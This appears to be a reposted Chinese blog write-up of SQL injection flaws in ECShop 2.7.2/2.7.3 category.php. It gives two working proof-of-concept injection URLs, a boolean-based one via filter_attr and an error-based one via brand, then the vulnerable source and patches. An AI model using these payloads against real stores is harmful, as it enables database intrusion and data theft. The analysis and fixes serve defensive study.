ecshop /category.php SQL Injection Vul

最新推荐文章于 2025-09-11 11:38:48 发布
转载 最新推荐文章于 2025-09-11 11:38:48 发布 · 187 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/LittleHann/p/4524161.html
文章标签:

#php

本文详细分析了 Ecshop 版本 2.7.2 和 2.7.3 中存在的 SQL 注入漏洞,提供了两个 PoC 示例并解释了漏洞触发条件。通过源代码分析,揭示了漏洞产生的根本原因,并提出了相应的修复建议。

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

Relevant Link:

http://sebug.net/vuldb/ssvid-19574


2. 漏洞触发条件

0x1: POC1

http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2
http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2

0x2: POC2

http://localhost/ecshop2.7.3/category.php?id=279&brand=173+AND+%28SELECT+1892+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x625454496147%2C%28SELECT+%28CASE+WHEN+%281892%3D1892%29+THEN+1+ELSE+0+END%29%29%2C0x6f4574774f4a%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29&price_min=0&price_max=0&page=2&sort=last_update&order=ASC


3. 漏洞影响范围
4. 漏洞代码分析

0x1: POC1

/category.php

..
$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';
//变量 $filter_attr_str 是以“.” 分开的数组
$filter_attr = empty($filter_attr_str) ? '' : explode('.', trim($filter_attr_str));
..
 /* 扩展商品查询条件 */
if (!empty($filter_attr))
{
    $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table('goods_attr') . " AS a, " . $ecs->table('goods_attr') . " AS b " .  "WHERE "; 
    $ext_group_goods = array();

    foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
    {
    if ($v != 0) 
    {
        //$v 没有作任何处理就加入了SQL查询,造成SQL注入
        $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] ." AND a.goods_attr_id = " . $v;
        ..

0x2: POC2

/category.php

else{
    /* 初始化分页信息 */
    $page = isset($_REQUEST['page'])   && intval($_REQUEST['page'])  > 0 ? intval($_REQUEST['page'])  : 1;
    $size = isset($_CFG['page_size'])  && intval($_CFG['page_size']) > 0 ? intval($_CFG['page_size']) : 10;
    //未对$_REQUEST['brand']参数进行有效过滤
    $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? $_REQUEST['brand'] : 0;
    $price_max = isset($_REQUEST['price_max']) && intval($_REQUEST['price_max']) > 0 ? intval($_REQUEST['price_max']) : 0;
    $price_min = isset($_REQUEST['price_min']) && intval($_REQUEST['price_min']) > 0 ? intval($_REQUEST['price_min']) : 0;
    $filter = (isset($_REQUEST['filter'])) ? intval($_REQUEST['filter']) : 0;
    $filter_attr_str = isset($_REQUEST['filter_attr']) ? htmlspecialchars(trim($_REQUEST['filter_attr'])) : '0';


5. 防御方法

0x1: POC1

/category.php

..
/*对用户输入的$_REQUEST['filter_attr']进行转义  */
$filter_attr_str = isset($_REQUEST['filter_attr']) ? htmlspecialchars(trim($_REQUEST['filter_attr'])) : '0';
/* */
$filter_attr_str = trim(urldecode($filter_attr_str));
/* 敏感关键字过滤 */
$filter_attr_str = preg_match('/^[\d\.]+$/',$filter_attr_str) ? $filter_attr_str : '';
/**/
$filter_attr = empty($filter_attr_str) ? '' : explode('.', $filter_attr_str);
..
foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
{ 
    /* is_numeric($v) */
    if (is_numeric($v) && $v !=0 )
    { 
    ..

0x2: POC2

/category.php

else{
    /* 初始化分页信息 */
    $page = isset($_REQUEST['page'])   && intval($_REQUEST['page'])  > 0 ? intval($_REQUEST['page'])  : 1;
    $size = isset($_CFG['page_size'])  && intval($_CFG['page_size']) > 0 ? intval($_CFG['page_size']) : 10;
    /* $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? $_REQUEST['brand'] : 0; */
    $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? intval($_REQUEST['brand']) : 0;
    /**/


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

转载于:https://www.cnblogs.com/LittleHann/p/4524161.html

[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 2056
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600
qq_51577576的博客
09-25 1464
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复此漏洞,vulhub使用其最新版本2.7.3和3.6.0非最新版本来重现该漏洞
category.php漏洞,ECShop V2.7.2 category.php SQL Injection Vulnerability
weixin_42151599的博客
04-01 253
### 漏洞代码分析/category.php```..$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';//变量 $filter_attr_str 是以“.” 分开的数组$filter_attr = empty($filter_attr_str) ? '' : exp...
ECShop 4.x collection_listSQL注入
weixin_56537388的博客
11-27 576
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口,数据库主机为mysql,账号密码为root。注册一个账户然后登录。docker环境搭建。
Eecshop 4.x collection_list SQL注入 漏洞复现
2301_76467680的博客
06-25 214
数据库账户密码 root/root。一直往下进行直至完成安装。
ECShop 2.x/3.x SQL注入/任意代码执行 漏洞复现
qq_44504968的博客
09-22 1529
ECShop 2.x/3.x SQL注入/任意代码执行 文章目录ECShop 2.x/3.x SQL注入/任意代码执行漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。
IPB2.1.7/2.2.x会员整合插件 for ECSHOP GBK版本.zip
07-14
适用范围 V2.7.0版本及之前下载安装的ECShop各版本;IPB(Invision Power Board)2.1.7/2.2.x。 安装说明:  1、下载相应编码的压缩包,并将文件解压缩。  2、将解压缩出来的文件上传到网店includes/modules/...
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现
ADummy的博客
02-24 907
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
shopex 4.8.5 SQLINJECTION注射以及后台拿SHELL
收集盒 Book box
07-09 1461
漏洞核心函数 \core\model_v5\trading\mdl.goods.php  由于是zend解密出来的 具体行数就不贴了 01 function getproducts( $gid, $pid = 0 ) //注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入 02 { 03 $sqlWhere = “”; 04 if ( 0
(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现
云舒的博客
07-05 1769
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
ECSHOP商城系统过滤不严导致SQL注入漏洞
盐碘
03-19 1602
添加时间: 2009-05-25 系统编号: WAVDB-01431 影响版本: ECSHOP 2.6.1/2.6.2 程序介绍:  ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 文件includes/init.php判断g
ecshop 2.x 3.x sql injection/rce payload
weixin_34019144的博客
09-07 377
首先,感谢ringk3y的分析:http://ringk3y.com/2018/08/31/ec ... %E6%89%A7%E8%A1%8C/ 大家跟一遍代码基本上都能弄明白漏洞的原理,整个漏洞的构造还是很有意思的 然后网上公开的基本上都是2.x版本的payload,对于sql injection,除了文中提到的insert_ads,insert_bought_notes函数同样存在漏洞:...
ecshop测试_ECShop最新4.1.0前台免登录SQL注入0day漏洞披露与分析
weixin_36124631的博客
01-19 1345
0x00 漏洞概述影响版本:ecshop4.1.0及以下是否需要身份认证:否,前台漏洞漏洞类型:SQL注入CNVD编号:CNVD-2020-58823,https://www.cnvd.org.cn/flaw/show/2454613漏洞来源:xcheck代码安全检查源码获取:https://www.ecshop.com/,登录注册下载,最新版本为4.1.1(已修复)。0x01 漏洞详情...
ECSHOP全版本注入漏洞分析
论文数据分析辅导,;论文人工智能辅导 huazhongxiaosx
11-25 4039
ECSHOP全版本注入漏洞分析   2014-04-03 10:34:52|  分类: Pentest-skills |举报 |字号 订阅           下载LOFTER 我的照片书  | 初学PHP,看了两天语法,找了ecshop全版本注入漏洞来分析,以小菜的角度沿着大牛的思路来前
PHP开源产品】Ecshop的商品筛选功能实现分析之一(主要对category.php进行分析)
zfeig的专栏
02-18 3698
PHP开源产品】Ecshop的商品筛选功能实现分析之一(主要对category.php进行分析) 一、首先,说明一下为什么要对category.php文件进行分析。 (1)原因如下: ①个人对商城类商品筛选功能的实现比较好奇; ②对商城中关于商品的数据表设计比较感兴趣。(该功能涉及到与数据库的交互,而且与数据库中数据表的设计好坏有一定的联系); ③多条件
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
物联网领域中PHP框架的最佳选择有哪些?
最新发布
09-11 583
物联网(IoT)作为近年来快速发展的技术领域,已经渗透到智能家居、工业自动化、智慧城市等方方面面。作为Web开发中广泛使用的语言,PHP凭借其易学易用、开发效率高和生态丰富的特点,也在物联网领域找到了用武之地。 本文将为大家介绍几款适用于物联网领域的PHP框架,帮助你在下一个IoT项目中做出明智的技术选择。
Action() { web_add_cookie("ECS_ID=d3a982c70109359a9e4b14c349b7a8f43fc01bb3; DOMAIN=192.168.77.133"); web_add_cookie("ECS[visit_times]=1; DOMAIN=192.168.77.133"); web_add_auto_header("Accept-Language", "zh-CN,zh;q=0.9"); web_url("ecshop", "URL=http://192.168.77.133/ecshop/", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=", "Snapshot=t1.inf", "Mode=HTML", EXTRARES, "Url=themes/default/images/topNavBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/bg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/foucsBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/NavBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/box_2Bg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/h3title.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/bnt_search.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/lineBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/catBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/itemH2Bg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/topNavR.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/searchBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/inputbg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=data/flashdata/dynfocus/data.js", ENDITEM, "Url=themes/default/images/helpTitBg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/logo1.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/footerLine.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/uh_bg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/bnt_ur_log.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/ur_bg.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, "Url=themes/default/images/ur_bg1.gif", "Referer=http://192.168.77.133/ecshop/themes/default/style.css", ENDITEM, LAST); web_url("bnt_log.gif", "URL=http://192.168.77.133/ecshop/user.php", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/", "Snapshot=t2.inf", "Mode=HTML", LAST); web_set_sockets_option("SSL_VERSION", "AUTO"); lr_think_time(15); web_submit_data("user.php", "Action=http://192.168.77.133/ecshop/user.php", "Method=POST", "TargetFrame=", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/user.php", "Snapshot=t3.inf", "Mode=HTML", ITEMDATA, "Name=username", "Value=test0042", ENDITEM, "Name=password", "Value=123456", ENDITEM, "Name=act", "Value=act_login", ENDITEM, "Name=back_act", "Value=http://192.168.77.133/ecshop/", ENDITEM, "Name=submit", "Value=", ENDITEM, LAST); web_url("诺基亚E66", "URL=http://192.168.77.133/ecshop/goods.php?id=9", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/", "Snapshot=t4.inf", "Mode=HTML", LAST); web_url("cron.php", "URL=http://192.168.77.133/ecshop/api/cron.php?t=1753254435", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/goods.php?id=9", "Snapshot=t5.inf", "Mode=HTML", EXTRARES, "Url=../themes/default/images/commentsBnt.gif", "Referer=http://192.168.77.133/ecshop/goods.php?id=9", ENDITEM, LAST); web_url("goods.php", "URL=http://192.168.77.133/ecshop/goods.php?act=price&id=9&attr=227&number=1&1753254436206206", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/goods.php?id=9", "Snapshot=t6.inf", "Mode=HTML", LAST); web_custom_request("flow.php", "URL=http://192.168.77.133/ecshop/flow.php?step=add_to_cart", "Method=POST", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/goods.php?id=9", "Snapshot=t7.inf", "Mode=HTML", "Body=goods={\"quick\":1,\"spec\":[\"227\"],\"goods_id\":7,\"number\":\"1\",\"parent\":0}", LAST); web_url("flow.php_2", "URL=http://192.168.77.133/ecshop/flow.php?step=cart", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/goods.php?id=9", "Snapshot=t8.inf", "Mode=HTML", LAST); web_url("checkout", "URL=http://192.168.77.133/ecshop/flow.php?step=checkout", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=cart", "Snapshot=t9.inf", "Mode=HTML", LAST); web_url("flow.php_3", "URL=http://192.168.77.133/ecshop/flow.php?step=select_shipping&shipping=5&1753254446354354", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t10.inf", "Mode=HTML", LAST); web_url("flow.php_4", "URL=http://192.168.77.133/ecshop/flow.php?step=select_payment&payment=1&1753254449555555", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t11.inf", "Mode=HTML", LAST); web_url("flow.php_5", "URL=http://192.168.77.133/ecshop/flow.php?step=select_pack&pack=0&1753254451388388", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t12.inf", "Mode=HTML", LAST); web_url("flow.php_6", "URL=http://192.168.77.133/ecshop/flow.php?step=select_card&card=0&1753254453200200", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t13.inf", "Mode=HTML", LAST); web_url("flow.php_7", "URL=http://192.168.77.133/ecshop/flow.php?step=check_surplus&surplus=0&1753254455323323", "TargetFrame=", "Resource=0", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t14.inf", "Mode=HTML", LAST); web_submit_data("flow.php_8", "Action=http://192.168.77.133/ecshop/flow.php?step=done", "Method=POST", "TargetFrame=", "RecContentType=text/html", "Referer=http://192.168.77.133/ecshop/flow.php?step=checkout", "Snapshot=t15.inf", "Mode=HTML", ITEMDATA, "Name=shipping", "Value=5", ENDITEM, "Name=payment", "Value=1", ENDITEM, "Name=pack", "Value=0", ENDITEM, "Name=card", "Value=0", ENDITEM, "Name=card_message", "Value=", ENDITEM, "Name=bonus", "Value=0", ENDITEM, "Name=bonus_sn", "Value=", ENDITEM, "Name=postscript", "Value=", ENDITEM, "Name=how_oos", "Value=0", ENDITEM, "Name=x", "Value=91", ENDITEM, "Name=y", "Value=20", ENDITEM, "Name=step", "Value=done", ENDITEM, LAST); return 0; } 在此代码中,为什么关联不到ECS_ID
07-24
我们正在处理一个关于LoadRunner脚本中web_add_cookie设置的ECS_ID未被正确关联的问题。 根据用户提供的信息,我们需要分析可能的原因并提供解决方法。 引用[4]提到了LoadRunner的三大组件,其中VuGen用于编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值